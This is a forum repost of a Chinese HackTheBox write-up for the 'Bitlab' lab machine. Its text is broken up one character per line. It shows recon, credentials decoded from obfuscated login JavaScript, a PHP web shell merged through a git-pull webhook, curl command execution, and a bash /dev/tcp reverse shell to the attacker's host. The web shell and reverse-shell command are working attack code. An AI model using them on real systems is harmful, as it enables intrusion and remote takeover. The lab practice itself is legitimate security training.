论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[26908] 2020-02-07_【HTB系列】靶机Bitlab的渗透测试
文档创建者:
s7ckTeam
浏览次数:
2
最后更新:
2025-01-19
渗透测试
2 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2020-02-07_【HTB系列】靶机Bitlab的渗透测试
【
H
T
B
系
列
】
靶
机
B
i
t
l
a
b
的
渗
透
测
试
原
创
徐
哥
M
s
0
8
0
6
7
安
全
实
验
室
2
0
2
0
-
0
2
-
0
7
收
录
于
话
题
#
靶
场
系
列
文
章
,
2
3
个
本
文
作
者
:
是
大
方
子
本
文
作
者
:
是
大
方
子
(
(
M
s
0
8
0
6
7
实
验
室
核
心
成
员
)
实
验
室
核
心
成
员
)
﹀
0
x
0
0
本
文
目
录
反
思
与
总
结
基
本
信
息
渗
透
测
试
过
程
补
充
0
x
0
1
反
思
与
总
结
1
.
c
u
r
l
发
送
G
E
T
参
数
化
请
求
2
.
对
反
弹
回
来
的
s
h
e
l
l
进
行
设
置
完
善
3
.
使
用
g
i
t
h
o
o
k
s
来
进
行
提
权
0
x
0
2
基
本
信
息
靶
机
I
P
地
址
:
1
0
.
1
0
.
1
0
.
1
1
4
K
a
l
i
I
P
地
址
:
1
0
.
1
0
.
1
4
.
1
3
0
x
0
3
渗
透
测
试
过
程
端
口
探
测
目
标
靶
机
开
放
了
8
0
和
2
2
端
口
目
录
探
测
我
们
先
从
8
0
下
手
,
查
看
下
网
页
内
容
r
o
o
t
@
k
a
l
i
:
~
/
H
T
B
/
b
i
t
l
a
b
#
n
m
a
p
‐
s
C
‐
s
V
‐
o
A
b
i
t
l
o
a
b
1
0
.
1
0
.
1
0
.
1
1
4
S
t
a
r
t
i
n
g
N
m
a
p
7
.
8
0
(
h
t
t
p
s
:
/
/
n
m
a
p
.
o
r
g
)
a
t
2
0
2
0
‐
0
1
‐
2
2
1
0
:
0
4
C
S
T
N
m
a
p
s
c
a
n
r
e
p
o
r
t
f
o
r
1
0
.
1
0
.
1
0
.
1
1
4
H
o
s
t
i
s
u
p
(
0
.
2
4
s
l
a
t
e
n
c
y
)
.
N
o
t
s
h
o
w
n
:
9
9
8
f
i
l
t
e
r
e
d
p
o
r
t
s
P
O
R
T
S
T
A
T
E
S
E
R
V
I
C
E
V
E
R
S
I
O
N
/
t
c
p
o
p
e
n
s
s
h
O
p
e
n
S
S
H
7
.
6
p
1
U
b
u
n
t
u
4
u
b
u
n
t
u
0
.
3
(
U
b
u
n
t
u
L
i
n
u
x
;
p
r
o
t
o
c
o
l
2
.
0
)
s
s
h
‐
h
o
s
t
k
e
y
:
2
0
4
8
a
2
:
3
b
:
b
0
:
d
d
:
2
8
:
9
1
:
b
f
:
e
8
:
f
9
:
3
0
:
8
2
:
3
1
:
2
3
:
2
f
:
9
2
:
1
8
(
R
S
A
)
2
5
6
e
6
:
3
b
:
f
b
:
b
3
:
7
f
:
9
a
:
3
5
:
a
8
:
b
d
:
d
0
:
2
7
:
7
b
:
2
5
:
d
4
:
e
d
:
d
c
(
E
C
D
S
A
)
_
2
5
6
c
9
:
5
4
:
3
d
:
9
1
:
0
1
:
7
8
:
0
3
:
a
b
:
1
6
:
1
4
:
6
b
:
c
c
:
f
0
:
b
7
:
3
a
:
5
5
(
E
D
2
5
5
1
9
)
/
t
c
p
o
p
e
n
h
t
t
p
n
g
i
n
x
h
t
t
p
‐
r
o
b
o
t
s
.
t
x
t
:
5
5
d
i
s
a
l
l
o
w
e
d
e
n
t
r
i
e
s
(
1
5
s
h
o
w
n
)
/
/
a
u
t
o
c
o
m
p
l
e
t
e
/
u
s
e
r
s
/
s
e
a
r
c
h
/
a
p
i
/
a
d
m
i
n
/
p
r
o
f
i
l
e
/
d
a
s
h
b
o
a
r
d
/
p
r
o
j
e
c
t
s
/
n
e
w
/
g
r
o
u
p
s
/
n
e
w
/
g
r
o
u
p
s
/
*
/
e
d
i
t
/
u
s
e
r
s
/
h
e
l
p
/
s
/
/
s
n
i
p
p
e
t
s
/
n
e
w
/
s
n
i
p
p
e
t
s
/
*
/
e
d
i
t
h
t
t
p
‐
t
i
t
l
e
:
S
i
g
n
i
n
x
C
2
x
B
7
G
i
t
L
a
b
_
R
e
q
u
e
s
t
e
d
r
e
s
o
u
r
c
e
w
a
s
h
t
t
p
:
/
/
1
0
.
1
0
.
1
0
.
1
1
4
/
u
s
e
r
s
/
s
i
g
n
_
i
n
_
h
t
t
p
‐
t
r
a
n
e
‐
i
n
f
o
:
P
r
o
b
l
e
m
w
i
t
h
X
M
L
p
a
r
s
i
n
g
o
f
/
e
v
o
x
/
a
b
o
u
t
S
e
r
v
i
c
e
I
n
f
o
:
O
S
:
L
i
n
u
x
;
C
P
E
:
c
p
e
:
/
o
:
l
i
n
u
x
:
l
i
n
u
x
_
k
e
r
n
e
l
S
e
r
v
i
c
e
d
e
t
e
c
t
i
o
n
p
e
r
f
o
r
m
e
d
.
P
l
e
a
s
e
r
e
p
o
r
t
a
n
y
i
n
c
o
r
r
e
c
t
r
e
s
u
l
t
s
a
t
h
t
t
p
s
:
/
/
n
m
a
p
.
o
r
g
/
s
u
b
m
i
t
/
.
N
m
a
p
d
o
n
e
:
1
I
P
a
d
d
r
e
s
s
(
1
h
o
s
t
u
p
)
s
c
a
n
n
e
d
i
n
3
4
.
4
4
s
e
c
o
n
d
s
先
使
用
g
o
b
u
s
t
e
r
进
行
扫
描
参
数
介
绍
:
参
数
介
绍
:
d
i
r
:
表
示
扫
描
目
录
的
模
式
-
w
:
使
用
的
字
典
-
t
:
线
程
数
量
-
s
:
只
显
示
响
应
码
为
2
0
0
,
2
0
4
,
3
0
1
,
3
0
7
,
4
0
1
,
4
0
3
的
路
径
,
因
为
我
们
访
问
网
页
的
时
候
有
些
位
置
是
不
允
许
我
们
访
问
会
被
3
0
2
跳
转
到
登
录
界
面
对
出
现
的
结
果
逐
一
查
看
,
发
现
除
了
h
e
l
p
外
其
他
的
网
页
都
没
什
么
可
用
信
息
漏
洞
发
现
打
开
h
e
l
p
下
的
b
o
o
k
m
a
r
k
s
.
h
t
m
l
对
这
几
个
超
链
接
逐
一
查
看
,
发
现
前
面
4
个
连
接
都
只
是
分
别
指
向
h
a
c
k
t
h
e
b
o
x
,
D
o
c
k
e
r
,
P
H
P
,
N
o
d
e
.
j
s
的
官
网
并
没
有
什
么
信
息
g
o
b
u
s
t
e
r
d
i
r
‐
u
"
h
t
t
p
:
/
/
1
0
.
1
0
.
1
0
.
1
1
4
/
"
‐
w
/
u
s
r
/
s
h
a
r
e
/
w
o
r
d
l
i
s
t
s
/
d
i
r
b
u
s
t
e
r
/
d
i
r
e
c
t
o
r
y
‐
l
i
s
t
‐
2
.
3
‐
m
e
d
i
u
m
.
t
x
t
‐
t
1
5
0
‐
s
2
0
0
,
2
0
4
,
3
0
1
,
3
0
7
,
4
0
1
,
4
0
3
‐
o
b
i
t
l
a
b
.
g
o
b
u
s
t
e
r
点
击
【
G
i
t
l
a
b
L
o
g
i
n
】
时
,
发
现
没
反
应
,
但
是
出
现
了
j
a
v
a
s
c
r
i
p
t
代
码
。
我
们
打
开
源
码
进
行
查
看
把
j
a
v
a
s
c
r
i
p
t
代
码
复
制
出
来
放
到
h
t
t
p
s
:
/
/
b
e
a
u
t
i
f
i
e
r
.
i
o
/
进
行
美
化
并
把
里
面
的
H
T
M
L
实
体
去
除
,
得
到
下
面
的
结
果
把
_
0
x
4
b
1
8
里
面
的
内
容
翻
译
下
(
十
六
进
制
转
字
符
)
j
a
v
a
s
c
r
i
p
t
:
(
f
u
n
c
t
i
o
n
(
)
{
v
a
r
_
0
x
4
b
1
8
=
[
"
x
7
6
x
6
1
x
6
C
x
7
5
x
6
5
"
,
"
x
7
5
x
7
3
x
6
5
x
7
2
x
5
F
x
6
C
x
6
F
x
6
7
x
6
9
x
6
E
"
,
"
x
6
7
x
6
5
x
7
4
x
4
5
x
6
C
x
6
5
x
6
D
x
6
5
x
6
E
x
7
4
x
4
2
x
7
9
x
4
9
x
6
4
"
,
"
x
6
3
x
6
C
x
6
1
x
7
6
x
6
5
"
,
"
x
7
5
x
7
3
x
6
5
x
7
2
x
5
F
x
7
0
x
6
1
x
7
3
x
7
3
x
7
7
x
6
F
x
7
2
x
6
4
"
,
"
x
3
1
x
3
1
x
6
4
x
6
5
x
7
3
x
3
0
x
3
0
x
3
8
x
3
1
x
7
8
"
]
;
d
o
c
u
m
e
n
t
[
_
0
x
4
b
1
8
[
2
]
]
(
_
0
x
4
b
1
8
[
1
]
)
[
_
0
x
4
b
1
8
[
0
]
]
=
_
0
x
4
b
1
8
[
3
]
;
d
o
c
u
m
e
n
t
[
_
0
x
4
b
1
8
[
2
]
]
(
_
0
x
4
b
1
8
[
4
]
)
[
_
0
x
4
b
1
8
[
0
]
]
=
_
0
x
4
b
1
8
[
5
]
;
}
)
(
)
那
么
下
面
2
行
代
码
感
觉
是
账
号
密
码
的
感
觉
,
我
们
在
登
录
界
面
使
用
c
o
n
s
o
l
e
进
行
尝
试
账
号
密
码
直
接
出
现
并
成
功
登
录
登
录
后
有
2
个
库
在
d
e
p
l
o
y
e
r
中
发
现
i
n
d
e
x
.
p
h
p
,
像
是
一
个
挂
钩
文
件
,
当
P
r
o
f
i
l
e
存
储
库
合
并
了
一
个
新
的
提
交
时
就
会
执
行
命
令
切
换
到
p
r
o
f
i
l
e
目
录
,
并
且
执
行
s
u
d
o
g
i
t
p
u
l
l
v
a
r
_
0
x
4
b
1
8
=
[
"
v
a
l
u
e
"
,
"
u
s
e
r
_
l
o
g
i
n
"
,
"
g
e
t
E
l
e
m
e
n
t
B
y
I
d
"
,
"
c
l
a
v
e
"
,
"
u
s
e
r
_
p
a
s
s
w
o
r
d
"
,
"
1
1
d
e
s
0
0
8
1
x
"
]
;
d
o
c
u
m
e
n
t
[
g
e
t
E
l
e
m
e
n
t
B
y
I
d
]
(
u
s
e
r
_
l
o
g
i
n
)
[
v
a
l
u
e
]
=
c
l
a
v
e
;
d
o
c
u
m
e
n
t
[
g
e
t
E
l
e
m
e
n
t
B
y
I
d
]
(
u
s
e
r
_
p
a
s
s
w
o
r
d
)
[
v
a
l
u
e
]
=
1
1
d
e
s
0
0
8
1
x
;
那
么
我
们
只
要
写
入
一
个
w
e
b
s
h
e
l
l
并
合
并
到
p
r
o
f
i
l
e
库
中
,
那
么
这
个
i
n
d
e
x
.
p
h
p
就
会
把
我
们
的
w
e
b
s
h
e
l
l
给
p
u
l
l
下
来
我
们
创
建
一
个
分
支
切
换
到
这
个
分
支
,
然
后
在
这
个
分
支
上
创
建
一
个
w
e
b
s
h
e
l
l
p
h
p
$
i
n
p
u
t
=
f
i
l
e
_
g
e
t
_
c
o
n
t
e
n
t
s
(
"
p
h
p
:
/
/
i
n
p
u
t
"
)
;
$
p
a
y
l
o
a
d
=
j
s
o
n
_
d
e
c
o
d
e
(
$
i
n
p
u
t
)
;
$
r
e
p
o
=
$
p
a
y
l
o
a
d
‐
>
p
r
o
j
e
c
t
‐
>
n
a
m
e
?
?
'
'
;
$
e
v
e
n
t
=
$
p
a
y
l
o
a
d
‐
>
e
v
e
n
t
_
t
y
p
e
?
?
'
'
;
$
s
t
a
t
e
=
$
p
a
y
l
o
a
d
‐
>
o
b
j
e
c
t
_
a
t
t
r
i
b
u
t
e
s
‐
>
s
t
a
t
e
?
?
'
'
;
$
b
r
a
n
c
h
=
$
p
a
y
l
o
a
d
‐
>
o
b
j
e
c
t
_
a
t
t
r
i
b
u
t
e
s
‐
>
t
a
r
g
e
t
_
b
r
a
n
c
h
?
?
'
'
;
(
$
r
e
p
o
=
=
'
P
r
o
f
i
l
e
'
&
&
$
b
r
a
n
c
h
=
=
'
m
a
s
t
e
r
'
&
&
$
e
v
e
n
t
=
=
'
m
e
r
g
e
_
r
e
q
u
e
s
t
'
&
&
$
s
t
a
t
e
=
=
'
m
e
r
g
e
d
'
)
e
c
h
o
s
h
e
l
l
_
e
x
e
c
(
'
c
d
.
.
/
p
r
o
f
i
l
e
/
;
s
u
d
o
g
i
t
p
u
l
l
'
)
,
"
n
"
;
e
c
h
o
"
O
K
n
"
;
写
入
一
个
w
e
b
s
h
e
l
l
,
并
提
交
创
建
合
并
请
求
p
h
p
(
i
s
s
e
t
(
$
_
R
E
Q
U
E
S
T
[
'
c
m
d
'
]
)
)
{
e
c
h
o
"
<
p
r
e
>
"
;
$
c
m
d
=
(
$
_
R
E
Q
U
E
S
T
[
'
c
m
d
'
]
)
;
s
y
s
t
e
m
(
$
c
m
d
)
;
e
c
h
o
"
<
/
p
r
e
>
"
;
d
i
e
;
然
后
就
可
以
看
到
我
们
的
w
e
b
s
h
e
l
l
就
成
功
合
并
如
m
s
t
a
e
r
库
此
时
应
该
会
被
之
前
的
挂
钩
文
件
p
u
l
l
到
本
地
,
我
们
尝
试
访
问
看
看
也
可
以
通
过
c
u
r
l
来
进
行
命
令
执
行
h
t
t
p
:
/
/
1
0
.
1
0
.
1
0
.
1
1
4
/
p
r
o
f
i
l
e
/
d
f
z
.
p
h
p
?
c
m
d
=
w
h
o
a
m
i
-
G
:
表
示
发
送
G
E
T
请
求
-
-
d
a
t
a
-
-
u
r
l
e
n
c
o
d
e
:
对
数
据
进
行
U
R
L
编
码
这
样
我
们
就
拿
到
了
w
e
b
s
h
e
l
l
反
弹
s
h
e
l
l
接
下
来
就
是
反
弹
s
h
e
l
l
k
a
l
i
先
n
c
先
监
听
端
口
然
后
用
c
u
r
l
反
弹
,
这
里
需
要
注
意
的
是
,
反
弹
s
h
e
l
l
的
指
令
前
面
还
需
要
用
到
b
a
s
h
-
c
c
u
r
l
‐
G
"
h
t
t
p
:
/
/
1
0
.
1
0
.
1
0
.
1
1
4
/
p
r
o
f
i
l
e
/
d
f
z
.
p
h
p
"
‐
‐
d
a
t
a
‐
u
r
l
e
n
c
o
d
e
'
c
m
d
=
w
h
o
a
m
i
'
c
u
r
l
‐
G
"
h
t
t
p
:
/
/
1
0
.
1
0
.
1
0
.
1
1
4
/
p
r
o
f
i
l
e
/
d
f
z
.
p
h
p
"
‐
‐
d
a
t
a
‐
u
r
l
e
n
c
o
d
e
"
c
m
d
=
b
a
s
h
‐
c
'
b
a
s
h
‐
i
>
&
/
d
e
v
/
t
c
p
/
1
0
.
1
0
.
1
4
.
1
3
/
9
0
0
1
0
>
&
1
'
"
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试